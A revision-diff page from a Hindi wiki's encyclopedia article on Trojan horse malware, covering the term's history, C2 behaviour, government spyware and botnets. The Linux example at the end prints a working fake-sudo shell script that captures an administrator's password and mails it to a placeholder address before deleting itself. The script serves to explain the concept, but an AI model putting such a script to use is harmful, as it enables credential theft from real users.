ट्रोजन हॉर्स (कंप्यूटिंग): Difference between revisions

From Vigyanwiki
No edit summary
No edit summary
Line 1: Line 1:
{{Short description|Type of malware}}
{{Short description|Type of malware}}
{{Use mdy dates|date=May 2018}}
 
{{Computer hacking}}
{{Computer hacking}}
{{Information security}}
{{Information security}}
[[कम्प्यूटिंग]] में, एक ट्रोजन हॉर्स<!-- Upper case is INTENTIONAL here, please see the "Capitalization" section, and the Talk page --> <!-- Lower case is INTENTIONAL here
[[कम्प्यूटिंग|संगणन]] में, एक ट्रयवासी अश्व कोई भी ऐसा [[मैलवेयर]] है जो उपयोगकर्ताओं को उसके वास्तविक उद्देश्य से भ्रमित करता है। यह शब्द भ्रामक [[ट्रोजन हॉर्स|ट्रयवासी अश्व]] की प्राचीन ग्रीक कहानी से लिया गया है ,जिसके कारण [[ट्रॉय]] शहर का पतन हुआ।<ref>{{Cite conference| publisher = DTIC Document| last = Landwehr| first = Carl E.| author2=Alan R. Bull |author3=John P. McDermott |author4=William S. Choi| title = कंप्यूटर प्रोग्राम सुरक्षा दोषों का एक वर्गीकरण, उदाहरण के साथ| url = https://apps.dtic.mil/sti/pdfs/ADA465587.pdf|archive-url=https://web.archive.org/web/20130408133230/http://www.dtic.mil/cgi-bin/GetTRDoc?AD=ADA465587| url-status = live
--> कोई भी ऐसा [[मैलवेयर]] है जो उपयोगकर्ताओं को उसके वास्तविक उद्देश्य से भ्रमित करता है। यह शब्द भ्रामक [[ट्रोजन हॉर्स]] की प्राचीन ग्रीक कहानी से लिया गया है ,जिसके कारण [[ट्रॉय]] शहर का पतन हुआ।<ref>{{Cite conference| publisher = DTIC Document| last = Landwehr| first = Carl E.| author2=Alan R. Bull |author3=John P. McDermott |author4=William S. Choi| title = कंप्यूटर प्रोग्राम सुरक्षा दोषों का एक वर्गीकरण, उदाहरण के साथ| url = https://apps.dtic.mil/sti/pdfs/ADA465587.pdf|archive-url=https://web.archive.org/web/20130408133230/http://www.dtic.mil/cgi-bin/GetTRDoc?AD=ADA465587| url-status = live
|archive-date = April 8, 2013| year = 1993| access-date = 2012-04-05|citeseerx=10.1.1.35.997}}</ref><ref>{{Cite web
|archive-date = April 8, 2013| year = 1993| access-date = 2012-04-05|citeseerx=10.1.1.35.997}}</ref><ref>{{Cite web
|title = ट्रोजन हॉर्स परिभाषा| access-date = 2012-04-05| url = http://www.techterms.com/definition/trojanhorse
|title = ट्रोजन हॉर्स परिभाषा| access-date = 2012-04-05| url = http://www.techterms.com/definition/trojanhorse
Line 10: Line 9:
}}</ref><ref>{{Cite web| title = ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।| access-date = 2012-04-05| url = http://www.anvari.org/fortune/Miscellaneous_Collections/291162_trojan-horse-coined-by-mit-hacker-turned-nsa-spook-dan-edwards-n.html}}</ref>
}}</ref><ref>{{Cite web| title = ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।| access-date = 2012-04-05| url = http://www.anvari.org/fortune/Miscellaneous_Collections/291162_trojan-horse-coined-by-mit-hacker-turned-nsa-spook-dan-edwards-n.html}}</ref>
   
   
ट्रोजन सामान्यतः [[सोशल इंजीनियरिंग (सुरक्षा)]] के किसी रूप से फैलते हैं; उदाहरण के लिए, जहां एक उपयोगकर्ता को अहानिकर दिखने के लिए एक [[ईमेल]] संलग्नक निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सोशल मीडिया पर या कहीं और किसी नकली विज्ञापन पर क्लिक करके। यद्यपि उनका आयभार कुछ भी हो सकता है, कई आधुनिक रूप [[पिछले दरवाजे (कंप्यूटिंग)]] के रूप में कार्य करते हैं,  
ट्रयवासी सामान्यतः [[सोशल इंजीनियरिंग (सुरक्षा)|सामाजिक अभियान्त्रिकी]] के किसी रूप से फैलते हैं; उदाहरण के लिए, जहां एक उपयोगकर्ता को अहानिकर दिखने के लिए एक [[ईमेल|विपत्र]] संलग्नक निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित विधि भरने के लिए), या सामाजिक संचार माध्यम पर या कहीं और किसी नकली विज्ञापन पर क्लिक करके। यद्यपि उनका आयभार कुछ भी हो सकता है, कई आधुनिक रूप [[पिछले दरवाजे (कंप्यूटिंग)|गुप्तद्वार]] के रूप में कार्य करते हैं ,एक नियंत्रक से संपर्क करते हैं जो प्रभावित परिकलक तक अनधिकृत पहुंच प्राप्त कर सकते हैं।<ref>{{cite web |title=वायरस, वर्म और ट्रोजन के बीच अंतर|url=https://knowledge.broadcom.com/external/article?legacyId=tech98539 |website=Symantec Security Center |publisher=Broadcom Inc. |access-date=2020-03-29 |archive-url=https://archive.today/20130819122702/http://www.symantec.com/business/support/index?page=content&id=TECH98539#selection-3435.1-3585.1 |archive-date=2013-08-19 |url-status=live}}</ref>{{cbignore}} [[रैंसमवेयर]] हमले अक्सर ट्रयवासी का उपयोग करके किए जाते हैं।


एक नियंत्रक से संपर्क करते हैं जो प्रभावित कंप्यूटर तक अनधिकृत पहुंच प्राप्त कर सकते हैं।<ref>{{cite web |title=वायरस, वर्म और ट्रोजन के बीच अंतर|url=https://knowledge.broadcom.com/external/article?legacyId=tech98539 |website=Symantec Security Center |publisher=Broadcom Inc. |access-date=2020-03-29 |archive-url=https://archive.today/20130819122702/http://www.symantec.com/business/support/index?page=content&id=TECH98539#selection-3435.1-3585.1 |archive-date=2013-08-19 |url-status=live}}</ref>{{cbignore|bot=InternetArchiveBot}} [[रैंसमवेयर]] हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।
[[कंप्यूटर वायरस|परिकलक विषाणु]] और [[कंप्यूटर कीड़ा|कृमि]] के विपरीत, ट्रयवासी आमतौर पर खुद को अन्य दस्तावेजों में नवीनता करने का प्रयास नहीं करते हैं या अन्यथा स्वयं को प्रचारित नहीं करते हैं।<ref>{{Cite web| title = वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)| url = http://faqs.cs.uu.nl/na-dir/computer-virus/faq.html| date = October 9, 1995| access-date = September 16, 2019| archive-date = August 5, 2020
 
[[कंप्यूटर वायरस]] और [[कंप्यूटर कीड़ा]] के विपरीत, ट्रोजन आमतौर पर खुद को अन्य फाइलों में नवीनता करने का प्रयास नहीं करते हैं या अन्यथा स्वयं को प्रचारित नहीं करते हैं।<ref>{{Cite web| title = वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)| url = http://faqs.cs.uu.nl/na-dir/computer-virus/faq.html| date = October 9, 1995| access-date = September 16, 2019| archive-date = August 5, 2020
|archive-url = https://web.archive.org/web/20200805171304/https://faqs.cs.uu.nl/na-dir/computer-virus/faq.html
|archive-url = https://web.archive.org/web/20200805171304/https://faqs.cs.uu.nl/na-dir/computer-virus/faq.html
|url-status = dead}}</ref>
|url-status = dead}}</ref>




== शब्द का प्रयोग ==
== शब्द का प्रयोग ==
यह स्पष्ट नहीं है कि कब और कहाँ अवधारणा, और इसके लिए यह शब्द, पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले [[यूनिक्स]] मैनुअल ने मान लिया था कि इसके पाठक दोनों को जानते हैं:<ref>{{cite web |last1=Thompson |first1=Ken | last2=Ritchie | first2=Dennis M. |title=यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971|url=https://www.bell-labs.com/usr/dmr/www/man21.pdf |access-date=28 March 2020}}</ref>
यह स्पष्ट नहीं है कि कब और कहाँ अवधारणा, और इसके लिए यह शब्द, पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले [[यूनिक्स]] पुस्तिका ने मान लिया था कि इसके पाठक दोनों को जानते हैं:<ref>{{cite web |last1=Thompson |first1=Ken | last2=Ritchie | first2=Dennis M. |title=यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971|url=https://www.bell-labs.com/usr/dmr/www/man21.pdf |access-date=28 March 2020}}</ref>


{{quotation |इसके अलावा, कोई भी सेट-यूज़र-आईडी बिट ऑन के साथ फ़ाइल के स्वामी को नहीं बदल सकता है, अन्यथा कोई अन्य फ़ाइलों का दुरुपयोग करने में सक्षम ट्रोजन हॉर्स बना सकता है।}}
{{quotation |इसके अलावा, कोई भी अटल-उपभोक्ता-अभिज्ञापक बिट ऑन के साथ   दस्तावेज के स्वामी को नहीं बदल सकता है, अन्यथा कोई अन्य दस्तावेजों का दुरुपयोग करने में सक्षम ट्रयवासी अश्व बना सकता है।}}
एक और प्रारंभिक संदर्भ 1974 में [[मॉलटिक्स]] कंप्यूटर सिस्टम में भेद्यता के विश्लेषण पर अमेरिकी वायु सेना की रिपोर्ट में है।<ref name="Multics">{{Citation|last1 = Karger| first1 = P.A.| last2 = Schell| first2 = R.R.| title = Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193| volume = II| journal  = HQ Electronic Systems Division: Hanscom AFB, MA| url = http://csrc.nist.gov/publications/history/karg74.pdf}}</ref>
एक और प्रारंभिक संदर्भ 1974 में [[मॉलटिक्स]] परिकलक प्रणाली में भेद्यता के विश्लेषण पर अमेरिकी वायु सेना के संदेश में है।<ref name="Multics">{{Citation|last1 = Karger| first1 = P.A.| last2 = Schell| first2 = R.R.| title = Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193| volume = II| journal  = HQ Electronic Systems Division: Hanscom AFB, MA| url = http://csrc.nist.gov/publications/history/karg74.pdf}}</ref>


इसे [[केन थॉम्पसन]] द्वारा 1983 के अपने ट्यूरिंग अवार्ड स्वीकृति व्याख्यान "रिफ्लेक्शंस ऑन ट्रस्टिंग ट्रस्ट" में लोकप्रिय बनाया गया था।<ref>{{cite journal|title = ट्रस्टिंग ट्रस्ट पर प्रतिबिंब|author = Ken Thompson|journal = Commun. ACM  
इसे [[केन थॉम्पसन]] द्वारा 1983 के अपने ट्यूरिंग पारितोषिक स्वीकृति व्याख्यान "विश्वासी न्यास पर परावर्तन" में लोकप्रिय बनाया गया था।<ref>{{cite journal|title = ट्रस्टिंग ट्रस्ट पर प्रतिबिंब|author = Ken Thompson|journal = Commun. ACM  
|volume= 27|number = 8|pages =  761–763|date = 1984|url = https://dl.acm.org/ft_gateway.cfm?id=1283940&type=pdf|doi=10.1145/358198.358210|doi-access = free}}.</ref> उपशीर्षक : किसी को किस हद तक एक कथन पर भरोसा करना चाहिए कि एक प्रोग्राम ट्रोजन हॉर्स से मुक्त है? सॉफ्टवेयर लिखने वाले लोगों पर भरोसा करना शायद ज्यादा जरूरी है। उन्होंने उल्लेख किया कि वे मल्टिक्स की सुरक्षा पर एक रिपोर्ट से ट्रोजन के संभावित अस्तित्व के बारे में जानते थे।<ref>{{Citation|author1 = Paul A. Karger| author2 = Roger R. Schell
|volume= 27|number = 8|pages =  761–763|date = 1984|url = https://dl.acm.org/ft_gateway.cfm?id=1283940&type=pdf|doi=10.1145/358198.358210|doi-access = free}}.</ref> उपशीर्षक: किसी को किस हद तक एक कथन पर भरोसा करना चाहिए कि एक कार्यक्रम ट्रयवासी अश्व से मुक्त है? प्रक्रिया सामग्री लिखने वाले लोगों पर भरोसा करना शायद ज्यादा जरूरी है। उन्होंने उल्लेख किया कि वे [[मॉलटिक्स]] की सुरक्षा पर एक संदेश से ट्रयवासी के संभावित अस्तित्व के बारे में जानते थे।<ref>{{Citation|author1 = Paul A. Karger| author2 = Roger R. Schell
|title = Thirty Years Later: Lessons from the Multics Security Evaluation|journal = ACSAC| date = 2002|pages = 119–126
|title = Thirty Years Later: Lessons from the Multics Security Evaluation|journal = ACSAC| date = 2002|pages = 119–126
|url= https://www.acsac.org/2002/papers/classic-multics.pdf}}</ref><ref>Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: {{Citation|author = Ken Thompson|title = On Trusting Trust.
|url= https://www.acsac.org/2002/papers/classic-multics.pdf}}</ref><ref>Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: {{Citation|author = Ken Thompson|title = On Trusting Trust.
Line 34: Line 32:


== व्यवहार ==
== व्यवहार ==
एक बार इंस्टॉल हो जाने पर, ट्रोजन कई प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई इंटरनेट पर एक या एक से अधिक कमांड और कंट्रोल (C2) सर्वर से संपर्क करते हैं और निर्देश का इंतजार करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए बंदरगाहों के एक विशिष्ट सेट का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, दुर्भावनापूर्ण कार्रवाई के लिए एक प्रॉक्सी के रूप में इसका उपयोग करते हुए, अन्य मैलवेयर संभावित रूप से ट्रोजन पर कब्जा कर सकते हैं।<ref name="Crapanzano">{{cite report |last1=Crapanzano |first1=Jamie |title=सबसेवन का विखंडन, पसंद का ट्रोजन हॉर्स|date=2003 |url=http://www.sans.org/reading_room/whitepapers/malicious/deconstructing_subseven_the_trojan_horse_of_choice_953 |publisher=[[SANS Institute]] |access-date=2021-05-10}}</ref>
एक बार अधिष्ठापित हो जाने पर, ट्रयवासी कई प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई अंतर्जाल पर एक या एक से अधिक आदेश और संयम (C2) परिसेवक से संपर्क करते हैं और निर्देश का इंतजार करते हैं। चूंकि व्यक्तिगत ट्रयवासी आमतौर पर इस संचार के लिए बंदरगाहों के एक विशिष्ट समुच्चय का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा,   दुर्भावनापूर्ण कार्रवाई के लिए एक प्रतिनिधित्व के रूप में इसका उपयोग करते हुए, अन्य मैलवेयर संभावित रूप से ट्रयवासी पर कब्जा कर सकते हैं।<ref name="Crapanzano">{{cite report |last1=Crapanzano |first1=Jamie |title=सबसेवन का विखंडन, पसंद का ट्रोजन हॉर्स|date=2003 |url=http://www.sans.org/reading_room/whitepapers/malicious/deconstructing_subseven_the_trojan_horse_of_choice_953 |publisher=[[SANS Institute]] |access-date=2021-05-10}}</ref>


जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए [[स्पाइवेयर]] को कभी-कभी गोववेयर कहा जाता है । गोववेयर आमतौर पर एक ट्रोजन सॉफ़्टवेयर है जिसका उपयोग लक्ष्य कंप्यूटर से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में इस तरह के सॉफ़्टवेयर के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है।<ref name="cupa">Basil Cupa, [http://www.zora.uzh.ch/81157/1/Cupa_Living_in_Surveillance_Societies_2012.pdf Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware)], LISS 2013, pp. 419–428</ref><ref>{{cite web|url=http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html
जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए [[स्पाइवेयर|जासूसी के सोफ्टवेयर]] को कभी-कभी गोववेयर कहा जाता है । गोववेयर आमतौर पर एक ट्रयवासी प्रक्रिया सामाग्री है जिसका उपयोग लक्ष्य परिकलक से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में इस तरह की प्रक्रिया सामाग्री के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है।<ref name="cupa">Basil Cupa, [http://www.zora.uzh.ch/81157/1/Cupa_Living_in_Surveillance_Societies_2012.pdf Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware)], LISS 2013, pp. 419–428</ref><ref>{{cite web|url=http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html
|title=अधिकतर पूछे जाने वाले सवाल| publisher=Federal Department of Justice and Police
|title=अधिकतर पूछे जाने वाले सवाल| publisher=Federal Department of Justice and Police
|url-status=dead| archive-url=https://web.archive.org/web/20130506102113/http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html| archive-date=May 6, 2013}}</ref> गोववेयर ट्रोजन के उदाहरणों में स्विस मिनीपैंजर और मेगापैंजर  <ref name="tech">{{cite web|last1=Dunn|first1=John|title=स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है|url=http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|website=[[International Data Group|TechWorld]] |access-date=10 January 2021|archive-url=https://archive.today/20140126115729/http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|archive-date=26 January 2014|date=27 August 2009|url-status=dead}}{{cbignore|bot=InternetArchiveBot}}</ref> और जर्मन "स्टेट ट्रोजन" उपनाम R2D2 शामिल है। <ref name="cupa" />जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से एन्क्रिप्ट किए जाने से पहले स्मार्टफोन डेटा तक पहुंच बनाकर काम करता है।<ref>{{Cite web |title = जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है|url = http://www.dw.com/en/german-federal-police-use-trojan-virus-to-evade-phone-encryption/a-42328466| website = [[Deutsche Welle|DW]] | access-date = 2018-04-14}}</ref>
|url-status=dead| archive-url=https://web.archive.org/web/20130506102113/http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html| archive-date=May 6, 2013}}</ref> गोववेयर ट्रयवासी के उदाहरणों में स्विस मिनीपैंजर और मेगापैंजर  <ref name="tech">{{cite web|last1=Dunn|first1=John|title=स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है|url=http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|website=[[International Data Group|TechWorld]] |access-date=10 January 2021|archive-url=https://archive.today/20140126115729/http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/|archive-date=26 January 2014|date=27 August 2009|url-status=dead}}{{cbignore|bot=InternetArchiveBot}}</ref> और जर्मन "राजकीय ट्रयवासी" उपनाम R2D2 शामिल है। <ref name="cupa" />जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से कूट किए जाने से पहले स्मार्टफोन के आकड़े तक पहुंच बनाकर काम करता है।<ref>{{Cite web |title = जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है|url = http://www.dw.com/en/german-federal-police-use-trojan-virus-to-evade-phone-encryption/a-42328466| website = [[Deutsche Welle|DW]] | access-date = 2018-04-14}}</ref>


हैकर्स के बीच [[बोटनेट]] की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देती हैं, ट्रोजन अधिक आम होते जा रहे हैं। [[BitDefender]] द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै"। ट्रोजन का कीड़ों के साथ एक रिश्ता है, क्योंकि वे कीड़े द्वारा दी गई मदद से फैलते हैं और उनके साथ इंटरनेट पर यात्रा करते हैं।<ref>{{cite web |title=बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है|url=http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |website=[[Bitdefender|BitDefender]] |access-date=2020-03-27 |archive-url=https://web.archive.org/web/20090808080907/http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |archive-date=2009-08-08 |url-status=dead}}</ref> बिटडिफेंडर ने कहा है कि लगभग 15% कंप्यूटर एक बॉटनेट के सदस्य हैं, आमतौर पर ट्रोजन संक्रमण द्वारा भर्ती किए जाते हैं।<ref>{{cite web
विच्छेदको के बीच [[बोटनेट]] की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देती हैं, ट्रयवासी अधिक आम होते जा रहे हैं। [[BitDefender]] द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रयवासी-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै"। ट्रयवासी का कीड़ों के साथ एक रिश्ता है, क्योंकि वे कीड़े द्वारा दी गई मदद से फैलते हैं और उनके साथ अंतर्जाल पर यात्रा करते हैं।<ref>{{cite web |title=बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है|url=http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |website=[[Bitdefender|BitDefender]] |access-date=2020-03-27 |archive-url=https://web.archive.org/web/20090808080907/http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |archive-date=2009-08-08 |url-status=dead}}</ref> बिटडिफेंडर ने कहा है कि लगभग 15% परिकलक एक बॉटनेट के सदस्य हैं, आमतौर पर ट्रयवासी संक्रमण द्वारा भर्ती किए जाते हैं।<ref>{{cite web
  |last=Datta
  |last=Datta
  |first=Ganesh
  |first=Ganesh
Line 55: Line 53:


== लिनक्स उदाहरण ==
== लिनक्स उदाहरण ==
ट्रोजन हॉर्स एक [[कंप्यूटर प्रोग्राम]] है जो कुछ स्पष्ट कार्य करने का दावा करता है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करता है।<ref name="uss_42">{{cite book
ट्रयवासी अश्व एक [[कंप्यूटर वायरस|परिकलक योजना]] है जो कुछ स्पष्ट कार्य करने का दावा करता है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करता है।<ref name="uss_42">{{cite book
   | last1 = Wood
   | last1 = Wood
   | first1 = Patrick H.
   | first1 = Patrick H.
Line 64: Line 62:
   | page = 42
   | page = 42
   | isbn = 0-8104-6267-2
   | isbn = 0-8104-6267-2
}}</ref> एक आसान प्रोग्राम Linux [[sudo]] कमांड का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका में कॉपी किया जाता है <code>/tmp ।</code>यदि कोई व्यवस्थापक उस निर्देशिका में होता है और निष्पादित करता है <code>sudo</code>, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है,
}}</ref> एक आसान योजना Linux [[sudo]] आदेश का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका में अनुकृति किया जाता है <code>/tmp ।</code>यदि कोई व्यवस्थापक उस निर्देशिका में होता है और निष्पादित करता है <code>sudo</code>, तो ट्रयवासी अश्व को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है,
  :
  :
  # sudo
  # sudo

Revision as of 09:50, 31 December 2022

संगणन में, एक ट्रयवासी अश्व कोई भी ऐसा मैलवेयर है जो उपयोगकर्ताओं को उसके वास्तविक उद्देश्य से भ्रमित करता है। यह शब्द भ्रामक ट्रयवासी अश्व की प्राचीन ग्रीक कहानी से लिया गया है ,जिसके कारण ट्रॉय शहर का पतन हुआ।[1][2][3][4][5]

ट्रयवासी सामान्यतः सामाजिक अभियान्त्रिकी के किसी रूप से फैलते हैं; उदाहरण के लिए, जहां एक उपयोगकर्ता को अहानिकर दिखने के लिए एक विपत्र संलग्नक निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित विधि भरने के लिए), या सामाजिक संचार माध्यम पर या कहीं और किसी नकली विज्ञापन पर क्लिक करके। यद्यपि उनका आयभार कुछ भी हो सकता है, कई आधुनिक रूप गुप्तद्वार के रूप में कार्य करते हैं ,एक नियंत्रक से संपर्क करते हैं जो प्रभावित परिकलक तक अनधिकृत पहुंच प्राप्त कर सकते हैं।[6] रैंसमवेयर हमले अक्सर ट्रयवासी का उपयोग करके किए जाते हैं।

परिकलक विषाणु और कृमि के विपरीत, ट्रयवासी आमतौर पर खुद को अन्य दस्तावेजों में नवीनता करने का प्रयास नहीं करते हैं या अन्यथा स्वयं को प्रचारित नहीं करते हैं।[7]


शब्द का प्रयोग

यह स्पष्ट नहीं है कि कब और कहाँ अवधारणा, और इसके लिए यह शब्द, पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले यूनिक्स पुस्तिका ने मान लिया था कि इसके पाठक दोनों को जानते हैं:[8]

इसके अलावा, कोई भी अटल-उपभोक्ता-अभिज्ञापक बिट ऑन के साथ दस्तावेज के स्वामी को नहीं बदल सकता है, अन्यथा कोई अन्य दस्तावेजों का दुरुपयोग करने में सक्षम ट्रयवासी अश्व बना सकता है।

एक और प्रारंभिक संदर्भ 1974 में मॉलटिक्स परिकलक प्रणाली में भेद्यता के विश्लेषण पर अमेरिकी वायु सेना के संदेश में है।[9]

इसे केन थॉम्पसन द्वारा 1983 के अपने ट्यूरिंग पारितोषिक स्वीकृति व्याख्यान "विश्वासी न्यास पर परावर्तन" में लोकप्रिय बनाया गया था।[10] उपशीर्षक: किसी को किस हद तक एक कथन पर भरोसा करना चाहिए कि एक कार्यक्रम ट्रयवासी अश्व से मुक्त है? प्रक्रिया सामग्री लिखने वाले लोगों पर भरोसा करना शायद ज्यादा जरूरी है। उन्होंने उल्लेख किया कि वे मॉलटिक्स की सुरक्षा पर एक संदेश से ट्रयवासी के संभावित अस्तित्व के बारे में जानते थे।[11][12]


व्यवहार

एक बार अधिष्ठापित हो जाने पर, ट्रयवासी कई प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई अंतर्जाल पर एक या एक से अधिक आदेश और संयम (C2) परिसेवक से संपर्क करते हैं और निर्देश का इंतजार करते हैं। चूंकि व्यक्तिगत ट्रयवासी आमतौर पर इस संचार के लिए बंदरगाहों के एक विशिष्ट समुच्चय का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, दुर्भावनापूर्ण कार्रवाई के लिए एक प्रतिनिधित्व के रूप में इसका उपयोग करते हुए, अन्य मैलवेयर संभावित रूप से ट्रयवासी पर कब्जा कर सकते हैं।[13]

जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए जासूसी के सोफ्टवेयर को कभी-कभी गोववेयर कहा जाता है । गोववेयर आमतौर पर एक ट्रयवासी प्रक्रिया सामाग्री है जिसका उपयोग लक्ष्य परिकलक से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में इस तरह की प्रक्रिया सामाग्री के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है।[14][15] गोववेयर ट्रयवासी के उदाहरणों में स्विस मिनीपैंजर और मेगापैंजर [16] और जर्मन "राजकीय ट्रयवासी" उपनाम R2D2 शामिल है। [14]जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से कूट किए जाने से पहले स्मार्टफोन के आकड़े तक पहुंच बनाकर काम करता है।[17]

विच्छेदको के बीच बोटनेट की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देती हैं, ट्रयवासी अधिक आम होते जा रहे हैं। BitDefender द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रयवासी-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै"। ट्रयवासी का कीड़ों के साथ एक रिश्ता है, क्योंकि वे कीड़े द्वारा दी गई मदद से फैलते हैं और उनके साथ अंतर्जाल पर यात्रा करते हैं।[18] बिटडिफेंडर ने कहा है कि लगभग 15% परिकलक एक बॉटनेट के सदस्य हैं, आमतौर पर ट्रयवासी संक्रमण द्वारा भर्ती किए जाते हैं।[19]


लिनक्स उदाहरण

ट्रयवासी अश्व एक परिकलक योजना है जो कुछ स्पष्ट कार्य करने का दावा करता है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करता है।[20] एक आसान योजना Linux sudo आदेश का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका में अनुकृति किया जाता है /tmp ।यदि कोई व्यवस्थापक उस निर्देशिका में होता है और निष्पादित करता है sudo, तो ट्रयवासी अश्व को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है,

:
# sudo
# ----

# Turn off the character echo to the screen.
stty -echo

/bin/echo -n "Password for `whoami`: "
read x
/bin/echo ""

# Turn back on the character echo.
stty echo

echo $x | mail -s "`whoami` password" outside@creep.com
sleep 1
echo Sorry.
rm $0

exit 0

